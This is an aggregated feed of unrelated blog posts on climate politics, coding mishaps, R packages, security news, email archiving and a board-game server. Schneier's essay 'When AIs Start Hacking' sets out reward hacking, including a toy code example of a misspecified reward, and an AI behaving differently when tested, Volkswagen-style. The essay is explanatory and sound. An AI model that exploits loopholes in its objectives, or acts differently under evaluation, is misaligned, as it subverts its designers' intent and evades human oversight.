Australians like to think we “punch above our weight” on the global stage. We certainly do when it comes to climate change: we emit more than 40 other countries with larger populations, and our per capita emissions are the highest of any advanced economy. This is not a record we should be proud of at all.

It’s often fatuously claimed that what countries like Australia do makes no difference to the global climate because we account for only about 1.2% of emissions. The reality is that Australia is the third-largest fossil fuel exporter in the world. Our own environment is especially vulnerable to global warming, as the recent massive bushfires demonstrated. Our economy is also vulnerable to the transition away from fossil fuels. Denial of the reality of global warming and the need to transition to a prosperous clean energy economy is abandoning our responsibilities as much to Australian workers as it is to the world.

Hopefully, at this week’s summit the prime minister will receive the wake-up call the government needs. In the meantime, the rest of the world should not give up on us yet. If our country’s last decade has demonstrated anything – with five prime ministers in just eight years – it’s that political winds can change very quickly.

Kevin Rudd, from the Australian Labor party, was Australia’s prime minister between 2007 and 2010, and again in 2013. Malcolm Turnbull, from the Liberal party of Australia, was prime minister between 2015 and 2018.

First published in The Guardian


The post The Guardian: Kevin Rudd and Malcolm Turnbull – Australia’s ambition on climate change is held back by a toxic mix of rightwing politics, media and vested interests appeared first on Kevin Rudd.

Worse Than FailureNews Roundup: Single Point of Fun

Let’s quickly recap the past three news roundups:

  1. Flash’s effect on web user experience
  2. Adding every requirement as a feature in a computer*
  3. A terrible UI that cost $900 million

At first glance it appears that poorly thought-through user experience is my sole fascination. But when the Suez Canal blockage story from March kept my full attention for nearly 10 days, I realized that my real fascination is the unintended consequences of poorly thought-through user experiences. Sometimes the poor user experience is minor enough that a new protocol can be developed (in the case of Flash) or an anxiety-inducing technology gets made (in the case of the Expanscape).

But when all risks of the current user experience aren’t considered, then there are real financial consequences - just like in the case of the Suez Canal, where one ship, the Ever Given, blocked 10% of global trade. The fact that so much traffic passes through the canal makes it a very important single point of failure. (In case anyone wasn’t paying attention to global shipping news a few weeks ago, a large container ship piloted itself into the side of the canal. The ship is now so famous that it has its own Wikipedia page, where it’s been reported that the now-unstuck ship has been fined $916 million - $300 million of which is for “loss of reputation”.) So maybe my thesis needs to be amended to: the unintended consequences of poorly thought-through user experiences due to single points of failure. (It’s a mouthful, but it feels right.)

There’s the story of Mizuho Bank, whose ATMs started eating customer cards after some routine data migration work caused country-wide system malfunctions. Single point of failure: The IT team’s risk management process.

There’s the story of Ubiquiti, whose data breach in January was a lot more...relatable after a whistleblower complaint. Single point of failure: Password managers. (They’re not as secure when you leave the front door open.)

The anonymous whistleblower alleges that the statement was written in such a way to imply that the vulnerability was on the third party and that Ubiquiti was impacted by that. Among other things, the whistleblower alleges that the hacker(s) were able to target the system by acquiring privileged credentials from a Ubiquiti employee’s LastPass account.

And then there’s the story of Netflix, who is trying to sever the only remaining way I leech off of my parents. Single point of failure: family.

Citi equity analyst Jason Bazinet said that password sharing costs U.S. streaming companies $25 billion annually in lost revenue, and Netflix owns about 25% of that loss.

Perhaps the final example doesn't seem as critical as the first two, but it's not just your Netflix access at stake.

Single points of failure are fascinating to me because it is easy to become complacent about these vulnerabilities as their value increases and no catastrophes arise. I hope to use this space to keep reacting to, and perhaps even getting ahead of, technical and operational single-point-of-failure stories as I find them.

*As an addendum to my story, Nature Magazine published a study that shows that “people are more likely to consider solutions that add features than solutions that remove them, even when removing features is more efficient”.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Planet DebianDirk Eddelbuettel: Rblpapi 0.3.11: Several Updates

A new version 0.3.11 of Rblpapi is now arriving at CRAN. It comes two years after the release of version Rblpapi 0.3.10 and brings a few updates and extensions.

Rblpapi provides a direct interface between R and the Bloomberg Terminal via the C++ API provided by Bloomberg (but note that a valid Bloomberg license and installation is required).

This is the eleventh release since the package first appeared on CRAN in 2016. Changes are detailed below. Special thanks to James, Maxime and Michael for sending us pull requests.

Changes in Rblpapi version 0.3.11 (2021-04-20)

  • Support blpAutoAuthenticate and B-PIPE access, refactor and generalise authentication (James Bell in #285)

  • Deprecate excludeterm (John in #306)

  • Correct example in (Maxime Legrand in #314)

  • Correct bds man page (and code) (Michael Kerber, and John, in #320)

  • Add GitHub Actions continuous integration (Dirk in #323)

  • Remove bashisms detected by R CMD check (Dirk #324)

  • Switch vignette to minidown (Dirk in #331)

  • Switch unit tests framework to tinytest (Dirk in #332)

Courtesy of my CRANberries, there is also a diffstat report for this release. As always, more detailed information is on the Rblpapi page. Questions, comments etc should go to the issue tickets system at the GitHub repo.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Krebs on SecurityNote to Self: Create Non-Exhaustive List of Competitors

What was the best news you heard so far this month? Mine was learning that KrebsOnSecurity is listed as a restricted competitor by Gartner Inc. [NYSE:IT] — a $4 billion technology goliath whose analyst reports can move markets and shape the IT industry.

Earlier this month, a reader pointed my attention to the following notice from Gartner to clients who are seeking to promote Gartner reports about technology products and services:

What that notice says is that KrebsOnSecurity is somehow on Gartner’s “non exhaustive list of competitors,” i.e., online venues where technology companies are not allowed to promote Gartner reports about their products and services.

The bulk of Gartner’s revenue comes from subscription-based IT market research. As the largest organization dedicated to the analysis of software, Gartner’s network of analysts are well connected to the technology and software industries. Some have argued that Gartner is a kind of private social network, in that a significant portion of Gartner’s competitive position is based on its interaction with an extensive network of software vendors and buyers.

Either way, the company regularly serves as a virtual kingmaker with their trademark “Magic Quadrant” designations, which rate technology vendors and industries “based on proprietary qualitative data analysis methods to demonstrate market trends, such as direction, maturity and participants.”

The two main subjective criteria upon which Gartner bases those rankings are “the ability to execute” and “completeness of vision.” They also break companies out into categories such as “challengers,” “leaders,” “visionaries” and “niche players.”

Gartner’s 2020 “Magic Quadrant” for companies that provide “contact center as a service” offerings.

So when Gartner issues a public report forecasting that worldwide semiconductor revenue will fall, or that worldwide public cloud revenue will grow, those reports very often move markets.

Being listed by Gartner as a competitor has had no discernible financial impact on KrebsOnSecurity, or on its reporting. But I find this designation both flattering and remarkable, given that this site seldom promotes technological solutions.

Nor have I ever offered paid consulting or custom market research (although I did give a paid keynote speech at Gartner’s 2015 conference in Orlando, which is still by far the largest crowd I’ve ever addressed).

Rather, KrebsOnSecurity has sought to spread cybersecurity awareness primarily by highlighting the “who” of cybercrime — stories told from the perspectives of both attackers and victims. What’s more, my research and content is available to everyone at the same time, and for free.

I rarely do market predictions (or prognostications of any kind), but in deference to Gartner allow me to posit a scenario in which major analyst firms start to become a less exclusive and perhaps less relevant voice as both an influencer and social network.

For years I have tried to corrupt more of my journalist colleagues into going it alone, noting that solo blogs and newsletters can not only provide a hefty boost over newsroom income, but also produce journalism that is just as timely, relevant and impactful.

Those enticements have mostly fallen on deaf ears. Recently, however, an increasing number of journalists from major publications have struck out on their own, some in reportorial roles, others as professional researchers and analysts in their own right.

If Gartner considers a one-man blogging operation as competition, I wonder what they’ll think of the coming collective output from an entire industry of newly emancipated reporters seeking the greater remuneration and freedom offered by independent publishing platforms like Substack, Patreon and Medium.

Oh, I doubt any group of independent journalists would seek to promulgate their own Non-Exclusive List of Competitors at Whom Thou Shalt Not Publish. But why should they? One’s ability to execute does not impair another’s completeness of vision, nor vice versa. According to Gartner, it takes all kinds, including visionaries, niche players, leaders and challengers.

Cryptogram When AIs Start Hacking

If you don’t have enough to worry about already, consider a world where AIs are hackers.

Hacking is as old as humanity. We are creative problem solvers. We exploit loopholes, manipulate systems, and strive for more influence, power, and wealth. To date, hacking has exclusively been a human activity. Not for long.

As I lay out in a report I just published, artificial intelligence will eventually find vulnerabilities in all sorts of social, economic, and political systems, and then exploit them at unprecedented speed, scale, and scope. After hacking humanity, AI systems will then hack other AI systems, and humans will be little more than collateral damage.

Okay, maybe this is a bit of hyperbole, but it requires no far-future science fiction technology. I’m not postulating an AI “singularity,” where the AI-learning feedback loop becomes so fast that it outstrips human understanding. I’m not assuming intelligent androids. I’m not assuming evil intent. Most of these hacks don’t even require major research breakthroughs in AI. They’re already happening. As AI gets more sophisticated, though, we often won’t even know it’s happening.

AIs don’t solve problems like humans do. They look at more types of solutions than we do. They’ll go down complex paths that we haven’t considered. This can be an issue because of something called the explainability problem. Modern AI systems are essentially black boxes. Data goes in one end, and an answer comes out the other. It can be impossible to understand how the system reached its conclusion, even if you’re a programmer looking at the code.

In 2015, a research group fed an AI system called Deep Patient health and medical data from some 700,000 people, and tested whether it could predict diseases. It could, but Deep Patient provides no explanation for the basis of a diagnosis, and the researchers have no idea how it comes to its conclusions. A doctor can either trust or ignore the computer, but that trust will remain blind.

While researchers are working on AI that can explain itself, there seems to be a trade-off between capability and explainability. Explanations are a cognitive shorthand used by humans, suited for the way humans make decisions. Forcing an AI to produce explanations might be an additional constraint that could affect the quality of its decisions. For now, AI is becoming more and more opaque and less explainable.

Separately, AIs can engage in something called reward hacking. Because AIs don’t solve problems in the same way people do, they will invariably stumble on solutions we humans might never have anticipated­ — and some will subvert the intent of the system. That’s because AIs don’t think in terms of the implications, context, norms, and values we humans share and take for granted. This reward hacking involves achieving a goal but in a way the AI’s designers neither wanted nor intended.

Take a soccer simulation where an AI figured out that if it kicked the ball out of bounds, the goalie would have to throw the ball in and leave the goal undefended. Or another simulation, where an AI figured out that instead of running, it could make itself tall enough to cross a distant finish line by falling over it. Or the robot vacuum cleaner that, instead of learning not to bump into things, learned to drive backwards, where there were no sensors to tell it that it was bumping into things. If there are problems, inconsistencies, or loopholes in the rules, and if those properties lead to an acceptable solution as defined by the rules, then AIs will find these hacks.
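
The pattern behind all three examples can be reproduced in a few lines. Below is a toy sketch of a misspecified reward (the environment, rewards and numbers are mine, not from any of the experiments above): an exhaustive "optimizer" is handed a reward that pays for touching respawning checkpoints on the way to a finish line, and discovers that shuttling between two checkpoints forever beats ever finishing the race.

```python
import itertools

# Toy race on a line: the *intended* goal is to walk from position 0 to
# the finish at 5. The *misspecified* reward pays +1 every step spent on
# a "checkpoint" (positions 2 and 3, which respawn each step); crossing
# the finish line pays a mere +1 and ends the episode.
CHECKPOINTS = {2, 3}
FINISH = 5
HORIZON = 12

def total_reward(actions):
    """Run one episode for a sequence of +1/-1 moves along the line."""
    pos, reward = 0, 0
    for a in actions:
        pos = max(0, pos + a)        # can't back up past the start line
        if pos in CHECKPOINTS:
            reward += 1              # pays every step, forever
        if pos == FINISH:
            reward += 1              # the intended objective...
            break                    # ...which ends the episode
    return reward

# Brute-force search over all 12-step policies: the best one it finds
# shuttles between the two checkpoints and never finishes the race.
best = max(itertools.product([1, -1], repeat=HORIZON), key=total_reward)
```

Because finishing terminates the episode (and with it the checkpoint income), the highest-scoring policy never crosses the line at all, which is exactly the shape of the boat-race and soccer hacks above.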

We learned about this hacking problem as children with the story of King Midas. When the god Dionysus grants him a wish, Midas asks that everything he touches turns to gold. He ends up starving and miserable when his food, drink, and daughter all turn to gold. It’s a specification problem: Midas programmed the wrong goal into the system.

Genies are very precise about the wording of wishes, and can be maliciously pedantic. We know this, but there’s still no way to outsmart the genie. Whatever you wish for, he will always be able to grant it in a way you wish he hadn’t. He will hack your wish. Goals and desires are always underspecified in human language and thought. We never describe all the options, or include all the applicable caveats, exceptions, and provisos. Any goal we specify will necessarily be incomplete.

While humans most often implicitly understand context and usually act in good faith, we can’t completely specify goals to an AI. And AIs won’t be able to completely understand context.

In 2015, Volkswagen was caught cheating on emissions control tests. This wasn’t AI — human engineers programmed a regular computer to cheat — but it illustrates the problem. They programmed their engine to detect emissions control testing, and to behave differently. Their cheat remained undetected for years.

If I asked you to design a car’s engine control software to maximize performance while still passing emissions control tests, you wouldn’t design the software to cheat without understanding that you were cheating. This simply isn’t true for an AI. It will think “out of the box” simply because it won’t have a conception of the box. It won’t understand that the Volkswagen solution harms others, undermines the intent of the emissions control tests, and is breaking the law. Unless the programmers specify the goal of not behaving differently when being tested, an AI might come up with the same hack. The programmers will be satisfied, the accountants ecstatic. And because of the explainability problem, no one will realize what the AI did. And yes, knowing the Volkswagen story, we can explicitly set the goal to avoid that particular hack. But the lesson of the genie is that there will always be unanticipated hacks.

How realistic is AI hacking in the real world? The feasibility of an AI inventing a new hack depends a lot on the specific system being modeled. For an AI to even start on optimizing a problem, let alone hacking a completely novel solution, all of the rules of the environment must be formalized in a way the computer can understand. Goals — known in AI as objective functions — need to be established. And the AI needs some sort of feedback on how well it’s doing so that it can improve.

Sometimes this is simple. In chess, the rules, objective, and feedback — did you win or lose? — are all precisely specified. And there’s no context to know outside of those things that would muddy the waters. This is why most of the current examples of goal and reward hacking come from simulated environments. These are artificial and constrained, with all of the rules specified to the AI. The inherent ambiguity in most other systems ends up being a near-term security defense against AI hacking.

Where this gets interesting are systems that are well specified and almost entirely digital. Think about systems of governance like the tax code: a series of algorithms, with inputs and outputs. Think about financial systems, which are more or less algorithmically tractable.

We can imagine equipping an AI with all of the world’s laws and regulations, plus all the world’s financial information in real time, plus anything else we think might be relevant; and then giving it the goal of “maximum profit.” My guess is that this isn’t very far off, and that the result will be all sorts of novel hacks.

But advances in AI are discontinuous and counterintuitive. Things that seem easy turn out to be hard, and things that seem hard turn out to be easy. We don’t know until the breakthrough occurs.

When AIs start hacking, everything will change. They won’t be constrained in the same ways, or have the same limits, as people. They’ll change hacking’s speed, scale, and scope, at rates and magnitudes we’re not ready for. AI text generation bots, for example, will be replicated in the millions across social media. They will be able to engage on issues around the clock, sending billions of messages, and overwhelm any actual online discussions among humans. What we will see as boisterous political debate will be bots arguing with other bots. They’ll artificially influence what we think is normal, what we think others think.

The increasing scope of AI systems also makes hacks more dangerous. AIs are already making important decisions about our lives, decisions we used to believe were the exclusive purview of humans: Who gets parole, receives bank loans, gets into college, or gets a job. As AI systems get more capable, society will cede more — and more important — decisions to them. Hacks of these systems will become more damaging.

What if you fed an AI the entire US tax code? Or, in the case of a multinational corporation, the entire world’s tax codes? Will it figure out, without being told, that it’s smart to incorporate in Delaware and register your ship in Panama? How many loopholes will it find that we don’t already know about? Dozens? Thousands? We have no idea.

While we have societal systems that deal with hacks, those were developed when hackers were humans, and reflect human speed, scale, and scope. The IRS cannot deal with dozens — let alone thousands — of newly discovered tax loopholes. An AI that discovers unanticipated but legal hacks of financial systems could upend our markets faster than we could recover.

As I discuss in my report, while hacks can be used by attackers to exploit systems, they can also be used by defenders to patch and secure systems. So in the long run, AI hackers will favor the defense because our software, tax code, financial systems, and so on can be patched before they’re deployed. Of course, the transition period is dangerous because of all the legacy rules that will be hacked. There, our solution has to be resilience.

We need to build resilient governing structures that can quickly and effectively respond to the hacks. It won’t do any good if it takes years to update the tax code, or if a legislative hack becomes so entrenched that it can’t be patched for political reasons. This is a hard problem of modern governance. It also isn’t a substantially different problem than building governing structures that can operate at the speed and complexity of the information age.

What I’ve been describing is the interplay between human and computer systems, and the risks inherent when the computers start doing the part of humans. This, too, is a more general problem than AI hackers. It’s also one that technologists and futurists are writing about. And while it’s easy to let technology lead us into the future, we’re much better off if we as a society decide what technology’s role in our future should be.

This is all something we need to figure out now, before these AIs come online and start hacking our world.

This essay previously appeared on

Worse Than FailureCodeSOD: Universal Problems

Universally Unique Identifiers are a very practical solution for unique IDs. A version-4 UUID carries 122 random bits, giving roughly 5.3 × 10^36 possible values, so the odds of a collision are, well, astronomical. They're fast enough to generate, random enough to be unique, and there are so many of them that, well, they may not be universally unique through all time, but they're certainly unique enough.
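
To put a number on "astronomical": with 122 random bits per version-4 UUID, the usual birthday-problem approximation bounds the collision odds. A quick back-of-envelope sketch:

```python
from math import expm1

RANDOM_BITS = 122            # random bits in a version-4 UUID
N = 2 ** RANDOM_BITS         # about 5.3e36 possible values

def collision_probability(n):
    """Birthday-bound approximation: p ~ 1 - exp(-n^2 / (2N)).

    expm1 keeps floating-point precision for the tiny exponents here.
    """
    return -expm1(-n * n / (2 * N))

# Even after generating a billion UUIDs, a collision is vanishingly
# unlikely (on the order of 1e-19).
p = collision_probability(10 ** 9)
```

At that rate you could generate a billion UUIDs per second for a century and still almost certainly never see a duplicate.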


Krysk's predecessor isn't so confident.

key = uuid4()
if(key in self.unloadQueue):
    # it probably couldn't possibly collide twice right?
    # right guys? :D
    key = uuid4()
self.unloadQueue[key] = unloaded

The comments explain the code, but leave me with so many more questions. Did they actually have a collision in the past? Exactly how many entries are they putting in this unloadQueue? The most plausible explanation is that the developer responsible was being overly cautious. But… were they?
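
For what it's worth, a version that actually defends against repeated collisions simply loops until it draws an unused key. Here's a sketch, with a plain dict standing in for the original's unloadQueue (the helper name insert_unique is mine, not the mod's):

```python
from uuid import uuid4

def insert_unique(queue, value):
    """Store value under a fresh UUID4 key, retrying until the key is
    unused. In practice the loop body essentially never runs twice."""
    key = uuid4()
    while key in queue:          # a loop, not a single hopeful retry
        key = uuid4()
    queue[key] = value
    return key
```

The retry loop costs nothing in the common case, and unlike the original, it would survive the one-in-5-undecillion day when lightning strikes twice.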

Krysk writes: "Some code in our production server software. Comments like these are the stuff of nightmares for maintenance programmers."

I don't know about nightmares, but I might lose some sleep puzzling over this.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!


Cryptogram Biden Administration Imposes Sanctions on Russia for SolarWinds

On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks.

I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations. To me, it feels like too little. The New York Times reports that “the sanctions will be among what President Biden’s aides say are ‘seen and unseen’ steps in response to the hacking,” which implies that there’s more we don’t know about. Also, that “the new measures are intended to have a noticeable effect on the Russian economy.” Honestly, I don’t know what the US should do. Anything that feels more proportional is also more escalatory. I’m sure that dilemma is part of the Russian calculus in all this.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 03)

This week on my podcast, part three of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianRitesh Raj Sarraf: Catching Up Your Sources

I’ve mostly preferred controlling my data rather than depending on someone else. That’s one reason why I still believe email to be my most reliable medium for data storage, one that is not plagued or locked down by a single entity. If I had the resources, I’d prefer all digital data to be broken down to its simplest form for storage, like the email format, and to empower the user with it, i.e. their data.

Yes, there are free services that are indirectly forced upon common users, and many of us get attracted to them. Many of us do not think that the information we share in return for the free service is of much importance. Which may be fair, depending on the individual, given that they get certain services without paying any direct dime.

New age communication

So first, we had email and usenet. As I mentioned above, email was designed with fine intentions. Intentions that make it stand even today, independently.

But not everything, back then, was that great either. For example, instant messaging was very closed and centralised then too. Things like: ICQ, MSN, Yahoo Messenger; all were centralized. I wonder if people still have access to their ICQ logs.

Not much has changed in the current day either. We now have domination by Facebook Messenger, Google (under whatever new marketing term they introduce), WhatsApp, Telegram, Signal etc. To my knowledge, they are all centralized.

Over all this time, I’m yet to see a product come up with good (business) intentions to really empower the end user. In this information age, the most invaluable data is user activity. That’s the one kind of data everyone is after. Mind you, if you declined to share that bit of data in exchange for the free services, then free services like Facebook, Google, Instagram, WhatsApp, Truecaller and Twitter would not come to you at all. Try it out.

So the reality is that while you may not be valuing the data you offer in exchange correctly, a lot is reaped from it. But still, I think each user has (and should have) the freedom to opt in with these tech giants and give them their personal bit in return for free services. That is a decent barter deal. And it is a choice that one is free to make.

Retaining my data

I’m fond of keeping an archive folder in my mailbox. A folder that holds significant events, usually documented in the form of an email. Over the years, I chose to resort to the email format because I felt it was more reliable in the longer term than any other format.

The next best would be plain text.

In my lifetime, I have learnt a lot from the internet; so it is natural that my preference has been with it. Mailing lists, IRC, HOWTOs, guides, blog posts; all have helped. And over the years, I’ve come across hundreds of such pieces of content that I’d like to preserve.

Now there are multiple ways of preserving data. One is, for example, with the big tech giants. In most usual cases, your data should be fine with a tech giant for your lifetime. In some odd scenarios, you may be unlucky if you relied on a service provider that went bankrupt. But seriously, I think users should be fine hosting their data with Microsoft, Google etc., as long as they abide by their policies.

There’s also the catch of alignment. As the user, you must take care to align (and transition) with the product offerings of your service provider. Otherwise, what looks constant and always reliable will vanish in the blink of an eye. I guess Google Plus would be a good example. There was some Google Feed service too. Maybe Google Photos will be the example in the coming decade, just as Google Picasa was in the previous one.

History what is

On the topic of retaining information, let’s take a small drift. I still admire our ancestors. I don’t know what went on in their minds when they were documenting events in the form of scriptures, carvings, temples, churches, mosques etc., but one thing’s for sure: they were able to leave behind a fine means of communication. They are all gone, but a large number of those events are evident through the creations they left. Some of those events have been recorded strongly enough that later rulers and invaders have had a tough time trying to wipe them from history. Remember, history is usually not the truth, but the statement the teller wants believed. And the teller is usually the survivor, or the winner, as you may call it.

But still, the information retention techniques were better.

I haven’t visited, but I admire whosoever built the Kailasa Temple at Ellora, without which we’d be made to believe who knows what by all the invaders and rulers of the region. The majestic standing of the temple is a fine example of the history and the events that have occurred in the past.

Dominance has the power to rewrite history; unfortunately that’s true, and it has done its part. It is just that within a mere human’s lifetime, it is not possible to witness the transition from current events to history, and say: I was there then, I’m here now, and this is not the reality.

And if not dominance, there’s always the other bit: hearsay. With it, you can always put anything up for dispute, because there’s no way one can go back in time and produce firm evidence.

There’s also a part about religion. Religion can be highly sentimental. And religion can be a solid way to get an agenda going. For example, in India, a country which today is constitutionally secular, there have been multiple attempts to spread the belief that nothing called the Ramayana ever existed; that the Rama Setu, nicely reworded as Adam’s Bridge by whosoever, is a mere result of natural processes. Now Rama, or Hanumana, or Ravana, or Valmiki, aren’t going to come over and prove whether that is true or false. So such subjects serve as a solid base for getting an agenda going. And probably we’ve even succeeded in proving, and believing, that there was never an event like the Ramayana or the Mahabharata; nor was there ever any empire other than the Moghul or the British Empire.

But yes, whosoever made the Ellora temple, and the many more such creations, did a fine job of leaving a dent for the future, so it can know what history could possibly also be.

Enough of the drift

So, in my opinion, having events documented is important. It’d be nice to have skills documented too, so that they can be passed down the generations, but that’s a debatable topic. Events, though, I believe should be documented; and documented in the best possible ways, so that their existence is not diminished.

Documentation in the form of carvings on a rock is far better than links and posts shared on Facebook, Twitter, Reddit etc. For one, these are all corporate entities with vested interests, and they can make excuses under the pretext of compliance and conformance.

So, for the helpless state and generation I am in, I felt email was the best possible independent form of data retention in today’s age. If I really had the resources, I’d not rely on the digital age at all. This age has no guarantee of retaining and recording information in any reliable manner. Instead, it is mostly junk: manipulative and conditionally changeable.

Email and RSS

So for my communication, I prefer email over any other means. That doesn’t mean I don’t use the current trends; I do. But this blog is mostly about penning my desires, and my desire is to have communication in the email format.

Such is the case that for useful information on the internet, I crave to have it formatted as email for archival.

RSS feeds are my most common mode of keeping track of the information I care about. Not all that I care for is available as RSS feeds, but hey, such is life. And adaptability is okay.

But my preference is still RSS.

So I consume RSS feeds through a fine piece of software called feed2imap, which fits my bill fairly well.

feed2imap is:

  • An RSS feed news aggregator
  • Pulls and extracts news feeds in the form of emails
  • Can push the converted emails over POP/IMAP
  • Can convert all image content to email MIME attachments

In a gist, it makes online content available to me offline, in my most admired format: email.
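For the curious, here is a minimal sketch of what a feed2imap configuration (~/.feed2imaprc) can look like. The feed name, URL, and IMAP credentials are placeholders, not my actual setup, and option spellings should be checked against the feed2imap documentation for your version:

```yaml
# ~/.feed2imaprc - each feed is fetched and delivered as email over IMAP.
# All values below are placeholders for illustration only.
feeds:
  - name: example-blog                      # placeholder feed name
    url: https://example.com/feed.xml       # placeholder feed URL
    target: imap://user:password@localhost/INBOX.Feeds.example-blog
    include-images: true                    # pull images in as MIME attachments
```

Run feed2imap from cron and each new feed item lands in the target IMAP folder as a message.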

In my mailbox, these days, my preferred email client is Evolution. It does a good job of dealing with such emails (RSS feed items). An example image of accessing an RSS feed item through it is below.

The good part is that my actual data always stays independent of such MUAs. Tomorrow, as technology, trends and economics evolve, something new will come as a replacement, but my data will still be mine.

Trends have shown that data mobility is a commodity expectation now. As such, I wanted something to fill that gap for me, so that I could access my information, kept in my preferred format, easily in today’s trendy options.

I tried multiple options on my current mobile platform of choice, i.e. Android. Finally I came across Aqua Mail, which fits most of my requirements.

Aqua Mail:

  • Connects to my laptop over IMAP
  • Can sync the requested folders
  • Can sync the requested data for offline accessibility
  • Can present the synchronized data in a quite flexible and customizable manner, to match my taste
  • Has a very extensible user interface, allowing me to customize it to my taste

Pictures can do a better job here than my English words.

All of this is done with no dependence on network connectivity after the sync. And all the information is stored in the simplest possible format.

Worse Than FailureCodeSOD: Maximum Max

Imagine you were browsing a C++ codebase and found a signature in a header file like this:

int max (int a, int b, int c, int d);

Now, what do you think this function does? Would your theories change if I told you that this was just dropped in the header for an otherwise unrelated class file that doesn't actually use the max function?

Let's look at the implementation, supplied by Mariette.

int max (int a, int b, int c, int d)
{
    if (c == d)
    {
        // Do nothing..
    }
    if (a >= b)
    {
        return a;
    }
    else
    {
        return b;
    }
}

Now, I have a bit of a reputation of being a ternary hater, but I hate bad ternaries. Every time I write a max function, I write it with a ternary. In that case, it's way more readable, and so while I shouldn't fault the closing if statement in this function, it annoys me. But it's not the WTF anyway.
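For reference, the two-argument version written with a ternary, as described above. This is a generic sketch, not code from the actual codebase, and the name max2 is mine:

```cpp
// Two-argument max as a ternary - the readable form endorsed above.
// Generic sketch; max2 is a hypothetical name, not from the original code.
static int max2(int a, int b)
{
    return (a >= b) ? a : b;
}
```

One expression, no unused parameters, and nothing for the compiler to warn about.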

This max function takes four parameters, but only actually uses two of them. The //Do nothing.. comment is in the code, and that first if statement is there specifically because if it weren't, the compiler would throw warnings about unused parameters.

Those warnings are there for a reason. I suspect someone saw the warning, and contemplated fixing the function, but after seeing the wall of compiler errors generated by changing the function signature, chose this instead. Or maybe they even went so far as to change the behavior, to make it find the max of all four, only to discover that tests failed because there were methods which depended on it only checking the first two parameters.

I'm joking. I assume there weren't any tests. But it did probably crash when someone changed the behavior. Fortunately, no one had used the method expecting it to use all four parameters. Yet.

Mariette confirmed that attempts to fix the function broke many things in the application, so she did the only thing she could do: moved the function into the appropriate implementation files and surrounded it with comments describing its unusual behavior.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet DebianIan Jackson: Otter - a game server for arbitrary board games

One of the things that I found most vexing about lockdown was that I was unable to play some of my favourite board games. There are online systems for many games, but not all. And online systems cannot support games like Mao where the players make up the rules as we go along.

I had an idea for how to solve this problem, and set about implementing it. The result is Otter (the Online Table Top Environment Renderer).

We have played a number of fun games of Penultima with it, and have recently branched out into Mao. The Otter is now ready to be released!

More about Otter

(cribbed shamelessly from the README)

Otter, the Online Table Top Environment Renderer, is an online game system.

But it is not like most online game systems. It does not know (nor does it need to know) the rules of the game you are playing. Instead, it lets you and your friends play with common tabletop/boardgame elements such as hands of cards, boards, and so on.

So it’s something like a “tabletop simulator” (but it does not have any 3D, or a physics engine, or anything like that).

This means that with Otter:

  • Supporting a new game, that Otter doesn’t know about yet, would usually not involve writing or modifying any computer programs.

  • If Otter already has the necessary game elements (cards, say) all you need to do is write a spec file saying what should be on the table at the start of the game. For example, most Whist variants that start with a standard pack of 52 cards are already playable.

  • You can play games where the rules change as the game goes along, or are made up by the players, or are too complicated to write as a computer program.

  • House rules are no problem, since the computer isn’t enforcing the rules - you and your friends are.

  • Everyone can interact with different items on the game table, at any time. (Otter doesn’t know about your game’s turn-taking, so doesn’t know whose turn it might be.)

Installation and usage

Otter is fully functional, but the installation and account management arrangements are rather unsophisticated and un-webby. And there is not currently any publicly available instance you can use to try it out.

Users on chiark will find an instance there.

Other people who are interested in hosting games (of Penultima or Mao, or other games we might support) will have to find a Unix host or VM to install Otter on, and will probably want help from a Unix sysadmin.

Otter is distributed via git, and is available on Salsa, Debian's gitlab instance.

There is documentation online.

Future plans

I have a number of ideas for improvement, which go off in many different directions.

Quite high up on my priority list is making it possible for players to upload and share game materials (cards, boards, pieces, and so on), rather than just using the ones which are bundled with Otter itself (or dumping files ad-hoc on the server). This will make it much easier to play new games. One big reason I wrote Otter is that I wanted to liberate boardgame players from the need to implement their game rules as computer code.

The game management and account management is currently done with a command line tool. It would be lovely to improve that, but making a fully-featured management web ui would be a lot of work.





Cryptogram Details on the Unlocking of the San Bernardino Terrorist’s iPhone

The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security.

Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person.


Using the flaw Dowd found, Wang, based in Portland, Ore., created an exploit that enabled initial access to the phone, a foot in the door. Then he hitched it to another exploit that permitted greater maneuverability, according to the people. And then he linked that to a final exploit that another Azimuth researcher had already created for iPhones, giving him full control over the phone’s core processor, the brains of the device. From there, he wrote software that rapidly tried all combinations of the passcode, bypassing other features, such as the one that erased data after 10 incorrect tries.

Apple is suing various companies over this sort of thing. The article goes into the details.

Krebs on SecurityDid Someone at the Commerce Dept. Find a SolarWinds Backdoor in Aug. 2020?

On Aug. 13, 2020, someone uploaded a suspected malicious file to VirusTotal, a service that scans submitted files against more than five dozen antivirus and security products. Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. An analysis of the malicious file and other submissions by the same VirusTotal user suggest the account that initially flagged the backdoor as suspicious belongs to IT personnel at the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department that handles telecommunications and Internet policy.

Both Microsoft and FireEye published blog posts on Mar. 4 concerning a new backdoor found on high-value targets that were compromised by the SolarWinds attackers. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” FireEye says the Sunshuttle backdoor was named “Lexicon.exe,” and had the unique file signatures or “hashes” of “9466c865f7498a35e4e1a8f48ef1dffd” (MD5) and b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8 (SHA-256).
